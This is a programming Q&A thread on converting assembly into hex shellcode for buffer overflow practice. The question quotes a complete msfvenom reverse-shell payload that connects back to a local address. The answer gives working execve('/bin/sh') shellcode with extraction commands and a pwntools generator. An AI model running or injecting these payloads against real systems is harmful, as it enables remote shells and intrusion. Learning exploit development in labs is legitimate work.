
I'm practicing buffer overflow exploitation and have reached the point where I can inject bytes into the target's memory. The problem is that I have very little space at ESP to work with, so I wrote a simple "hello world" in assembly:

The Assembly code (simple hello world)

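global _start
; 64-bit only (uses the x86-64 Linux system-call numbers)
_start:
    jmp short string        ; jump forward so the call below can push the string's address

code:
    pop rsi                 ; rsi = address of the string (return address pushed by call)
    xor rax, rax
    mov al, 1               ; rax = 1 (sys_write)
    mov rdi, rax            ; rdi = 1 (stdout)
    mov rdx, rdi
    add rdx, 13             ; rdx = 14, the length of the string including the newline
    syscall

    xor rax, rax
    add rax, 60             ; rax = 60 (sys_exit)
    xor rdi, rdi            ; exit status 0
    syscall

string:
    call code               ; pushes the address of the string and jumps back to code
    db  'Hello, world!',0x0A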

This was written for NASM.
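The `jmp short string` / `call code` / `pop rsi` pattern in the listing is what makes it position-independent: `call` pushes the address of the byte that follows it, which is the string, so no absolute address has to be known in advance. A side effect is that a backward `call` has a negative displacement, which encodes as `ff` bytes instead of zeros. The Python sketch below shows how the `E8 rel32` encoding is derived. The helper name `call_rel32` is made up for illustration, and the offsets 32 and 2 are my own count of the instruction sizes in the listing, so treat them as an assumption.

```python
import struct

def call_rel32(call_offset: int, target_offset: int) -> bytes:
    """Encode a near call (opcode E8) placed at call_offset that targets target_offset."""
    # The displacement is measured from the end of the 5-byte call instruction.
    displacement = target_offset - (call_offset + 5)
    return b"\xe8" + struct.pack("<i", displacement)

backward = call_rel32(32, 2)   # call placed after the code, jumping back to it
forward = call_rel32(0, 32)    # hypothetical layout with the call placed first
print(backward.hex(" "))       # e8 dd ff ff ff
print(forward.hex(" "))        # e8 1b 00 00 00
```

The forward variant contains three zero bytes, which matters when the injection path stops copying at `0x00`.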

I first came across this approach when generating a payload with msfvenom. It has an option to choose the output language for the shellcode (I chose C), and it then emits the machine code as hex escapes that you can inject into memory and run.

The Hex Code (executable hex code for a reverse shell)

unsigned char buf[] = \xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x89\xe5\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x31\xff\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x66\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5;

But when I tried to do the same myself, I found that I have to write the program in assembly and then convert it to that hex form. I have been looking for a way to do this for a week without success.

What I've tried

I tried converting the assembly instructions to hex one by one and then appending the operands (also converted to hex), which unsurprisingly did not work.

-----

The assembly code above assembles with `./nasm.exe -fwin64 shellcode.asm` but not with `./nasm.exe -fwin32 shellcode.asm`.

I think it is not compatible with 32-bit.

Also, when I run `./nasm.exe -felf64 shellcode.asm -o shellcode.o` and then `ld -s -o shellcode shellcode.o`, it says the format of the file shellcode.o is unrecognized.
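One possible explanation for the `ld` error, and this is an assumption because the question does not say which `ld` was used: the `ld` that ships with a Windows toolchain usually expects PE/COFF objects, while `-felf64` emits an ELF object. A rough way to see what NASM actually produced is to look at the first bytes of the file. The sketch below is illustrative only; `guess_object_format` is a name invented here, and it recognizes just three cases.

```python
def guess_object_format(header: bytes) -> str:
    """Guess an object file's format from its first bytes."""
    if header[:4] == b"\x7fELF":
        return "ELF"
    if header[:2] == b"\x64\x86":   # COFF Machine field 0x8664 (x86-64), little-endian
        return "COFF x86-64"
    if header[:2] == b"\x4c\x01":   # COFF Machine field 0x014c (i386), little-endian
        return "COFF i386"
    return "unknown (possibly a flat binary)"

# Usage with a real file (the path is hypothetical):
#   with open("shellcode.o", "rb") as f:
#       print(guess_object_format(f.read(4)))
print(guess_object_format(b"\x7fELF\x02\x01\x01"))
```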

segfaulty
  • You will need to fill in the addresses for `helloMsg`, `printf` and `exit` yourself. – Jester Dec 17 '21 at 13:16
  • but I can't get the definitions of the variables to be converted to hex. Also, does the address of the variables in the assembly stay the same when you inject the hex code into the memory stack of another process? I just discovered an option in NASM that gives the hex for the assembly, but it says "Intel Hex encoded flat binary", so I don't know if that's the right hex code. I generate it with the command "nasm.exe -f ith main.asm". – segfaulty Dec 17 '21 at 13:28
  • I've added it to the answer with the output. – segfaulty Dec 17 '21 at 13:33
  • No, ihex is a special format. You just want a flat binary `-f bin` and use a hexdump tool. In any case, as I said, you will need to fill in the addresses which do depend on the target process (and of course the target needs to have the C library mapped to start with). – Jester Dec 17 '21 at 13:42
  • Yes, the code and data all need to be together in one section (not `.data`), but using libc functions is not a good starting point for making shellcode, if that's what you're trying to do. You also would of course need to use PC-relative addressing for the data, not 32-bit absolute. (Or as Jester says, to fix up the address.) – Peter Cordes Dec 17 '21 at 13:50
  • oh, ok so I have to debug first to get the addresses, then hardcode them in the assembly code using the right format (little-endian, etc.), then assemble and copy the hex using the "HxD" tool? – segfaulty Dec 17 '21 at 13:52
  • @PeterCordes I've changed the syntax since I switched to using nasm.exe, (post edited). – segfaulty Dec 17 '21 at 13:56
  • Now you've put your strings in `section .data` which definitely won't work for shellcode. But you're targeting Linux `int 0x80` system calls, now, apparently, so you don't need to know addresses of library functions or anything, and can just make a self-contained thing that uses position-independent addressing to reach its own data. So that makes it easy, just look for any hello world x86 32-bit shellcode example or tutorial. – Peter Cordes Dec 17 '21 at 13:57
  • oh, I thought I was making shellcode for Windows x86! I'm so lost right now. All I understand is that I should use PC-relative addressing instead of hardcoded addresses, and put the variables in the .text section so that they end up on the stack with the code instead of in the data section, I guess. – segfaulty Dec 17 '21 at 14:02
  • I guess I'll have to get back the syntax i was using in VS2019 and remove the libc functions. is that right? – segfaulty Dec 17 '21 at 14:03
  • If you know what Windows version you're targeting and can look up reverse-engineered system-call numbers, you could maybe use `int 0x2e` directly, if that still works under 64-bit kernels. (The WinAPI DLLs far-jump to 64-bit mode for `syscall`). It doesn't really matter whether you use MASM or NASM; any MASM features that help linking to DLLs are irrelevant, so you probably just want NASM to make flat binaries. It's not NASM that means you're targeting Linux, it's the use of `int 0x80`, which only Linux kernels use. It will just fault on Windows; try it in non-shellcode. – Peter Cordes Dec 17 '21 at 14:10
  • [Linux 64-bit shellcode](https://stackoverflow.com/q/26823678) shows how to convert `objdump -d` disassembly to a C-string with a hacktastic inefficient shell one-liner. (It doesn't matter what the target OS actually is; that happens to be Linux x86-64 shellcode but it would work the same for `nasm -fwin32` or `nasm -felf32`.) Not a duplicate because that's not what the question's about. And it's probably not the best hex-dump method. – Peter Cordes Dec 17 '21 at 14:13
  • someone just told me to use "int 21h", I think it's x86. so now I need to read a little bit about pc-relative addressing. and removing bad chars which is only "0x00" as I found when debugging the vulnerable app. is this it or i need something else for this to work? – segfaulty Dec 17 '21 at 14:18
  • @PeterCordes thanks for the reference, I think this would help a lot. – segfaulty Dec 17 '21 at 14:23
  • @lovethisstuff: Interrupt 21h services only work for 86-DOS processes, **not** for MS Windows. – ecm Dec 17 '21 at 14:28
  • @ecm ok thanks, so syscall is the way to go here. – segfaulty Dec 17 '21 at 14:31
  • this is so frustrating. I think I'll need another week to get where I need to be. By injecting this simple shellcode I think I'll learn the basics that will help me learn how to do a more complicated one. – segfaulty Dec 17 '21 at 14:33
  • No, you should only use `syscall` in 64-bit code, not 32-bit. (It was introduced by AMD, so modern AMD CPUs support it even in 32-bit mode, but Intel only adopted `syscall` for 64-bit mode.) It's easier to learn asm if you start by writing normal programs and see how they assemble to machine code. (And on Windows I guess start playing around with how to avoid libraries? Or just target Linux shellcode since it has a stable system-call ABI). Only once you understand that should you start thinking about how to inject snippets of machine code + data into other processes! – Peter Cordes Dec 17 '21 at 14:51
  • @PeterCordes oh that explains why I wouldn't compile using `nasm fwin32` – segfaulty Dec 17 '21 at 14:53
  • @PeterCordes `ld -s -o shellcode shellcode.o` **says unrecognized format**, – segfaulty Dec 17 '21 at 14:54
  • I found an example call to a Windows function without using interrupts: ```global _main extern _printf section .text _main: push message call _printf add esp, 4 ret message: db 'Hello, World', 10, 0``` – segfaulty Dec 17 '21 at 14:57
  • You're using 64-bit registers (i.e. `rax`), not 32-bit (i.e. `eax`) ones- why would it compile as 32-bit? – user1280483 Dec 19 '21 at 01:50

1 Answer


I learned this in a software security course. That was over a year ago, so I don't remember every detail; I will focus on the main points.

Let's write simple assembly code first.

GLOBAL _start
_start:
    xor rdx, rdx                ; rdx = 0 (envp = NULL); xor edx, edx saves 1 byte
    push rdx                    ; push 8 zero bytes to terminate the string
    mov rax, 0x68732f2f6e69622f ; '/bin//sh' as a little-endian 64-bit value
    push rax                    ; push '/bin//sh' onto the stack
    mov rdi, rsp                ; rdi = address of '/bin//sh' (filename)
    push rdx                    ; argv[1] = NULL
    push rdi                    ; argv[0] = address of '/bin//sh'
    mov rsi, rsp                ; rsi = argv
    xor rax, rax
    mov al, 0x3b                ; rax = 59 (sys_execve)
    syscall
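The constant `0x68732f2f6e69622f` does not have to be worked out by hand. As a small sketch (plain Python, standard library only), the eight bytes of `'/bin//sh'` can be read as a little-endian 64-bit integer, which is the value `mov rax, imm64` needs so that the bytes land on the stack in string order:

```python
import struct

path = b"/bin//sh"                     # 8 bytes, so it exactly fills one 64-bit register
(value,) = struct.unpack("<Q", path)   # interpret the bytes as a little-endian integer
print(hex(value))                      # 0x68732f2f6e69622f
```

The doubled slash is padding: it brings the string to exactly 8 bytes, so the immediate itself contains no zero byte.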

Use NASM to assemble the code, then link and run the shellcode.

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode               
./shellcode

Use objdump to get the hex output. You can use Compiler Explorer as well.

objdump -d shellcode

You can extract the shellcode directly by filtering out the irrelevant output with the pipeline below. It keeps 7 fields per line (`cut -f1-7`) because objdump typically prints up to 7 bytes per line; keeping only 6 would silently drop a byte of the 10-byte `mov rax, imm64`.

objdump -d ./shellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

This is the output.

"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"

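According to the comments, the following commands also work once `bits 64` is added to the assembly source, because NASM then assembles it into a flat binary that contains only the machine code.

nasm shellcode.asm
xxd -ps shellcode |  sed 's/../\\x\0/g'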
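If `xxd` or `sed` is not at hand (for example on Windows), the same conversion is a few lines of Python. This is only a sketch: `to_c_string` is a name chosen here, and it assumes the input is a flat binary, not an ELF or COFF object. It also emits one unbroken string, whereas `xxd -ps` wraps its output every 30 bytes.

```python
def to_c_string(code: bytes) -> str:
    """Format raw machine code as a C string literal made of \\x escapes."""
    return '"' + "".join(f"\\x{b:02x}" for b in code) + '"'

# Usage with a flat binary (the file name is hypothetical):
#   with open("shellcode", "rb") as f:
#       print(to_c_string(f.read()))
print(to_c_string(bytes.fromhex("31d20f05")))   # "\x31\xd2\x0f\x05"
```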

Besides, if you are new to CTFs, you can use pwntools, which is much more convenient.

from pwn import *
context(arch = 'amd64', os = 'linux',log_level = 'debug')
shellcode=asm(shellcraft.amd64.linux.sh())
print(shellcode)

You can also use Cobalt Strike and msfvenom.
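Whichever tool produces the bytes, it is worth checking them for bad characters before injecting them; the question's comments mention `0x00` as the only bad character for that target. A minimal sketch follows, with `find_bad_bytes` as an illustrative name. The two byte strings are the standard encodings of `mov eax, 1` and of `xor eax, eax` followed by `mov al, 1`, which shows why shellcode tends to prefer the second form.

```python
def find_bad_bytes(code: bytes, bad: bytes = b"\x00") -> list:
    """Return the offsets in code that hold a forbidden byte value."""
    return [i for i, b in enumerate(code) if b in bad]

mov_eax_1 = bytes.fromhex("b801000000")       # mov eax, 1
xor_then_mov_al = bytes.fromhex("31c0b001")   # xor eax, eax ; mov al, 1
print(find_bad_bytes(mov_eax_1))         # [2, 3, 4]
print(find_bad_bytes(xor_then_mov_al))   # []
```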

ecm
moep0
  • Don't post pictures of text unless there's more than actually just text. Here, you could have copy/pasted from your terminal into a code block. You did extract that actual `objdump` command into a code block, but the nasm/ld build commands are obscured inside an image. – Peter Cordes Dec 18 '21 at 12:52
  • Also, what ancient NASM version are you using that doesn't default to optimizing your inefficient code, e.g. your `xor rdx, rdx` is still coming out with a useless REX.W prefix. NASM for years has defaulted to `-O2` so you get the [optimal](https://stackoverflow.com/q/33666617/224132) and architecturally equivalent `31 d2 xor %edx, %edx`, as in [Why NASM on Linux changes registers in x86\_64 assembly](https://stackoverflow.com/q/48596247). Or maybe you actually used YASM to make that machine code? It won't optimize the operand-size for you by default. – Peter Cordes Dec 18 '21 at 12:55
  • Or you could just use `nasm shellcode.asm ; xxd -ps shellcode`... – Arget Dec 18 '21 at 16:25
  • @PeterCordes Fixed the problem of using pictures of text. Besides, I am using NASM 2.14.02, which seems to be the latest version. Compiler Explorer gives the same result. – moep0 Dec 20 '21 at 02:53
  • @Arget I tried this method. It gives too much irrelevant hex output. – moep0 Dec 20 '21 at 02:55
  • Oh hmm, apparently I'm mistaken. I knew NASM optimized `mov rax, 1` into `mov eax, 1` for you, but it seems it doesn't optimize xor-zeroing with 2.11.05 or 2.15.05 when I actually tried it just now. So you should always do that manually, unless you want an ASCII `'H'` there in your shellcode for some reason. – Peter Cordes Dec 20 '21 at 03:11
  • xxd doesn't give any irrelevant hex output. You're probably running it on `nasm -felf64` output and dumping the ELF metadata. That's not what @Arget wrote; for `nasm shellcode.asm` to work, you need to use `bits 64` so you can assemble 64-bit machine code into a flat binary, but then you're golden and can just hexdump that. (And add `\x` between pairs of hex digits by piping through `sed 's/../\\x\0/g' ` or awk or something.) – Peter Cordes Dec 20 '21 at 03:13
  • @PeterCordes That's right. Since the space for shellcode is very tight sometimes, it is helpful to use some code-golf tricks. Besides, `bits 64` does work. Thanks for pointing it out. – moep0 Dec 20 '21 at 08:24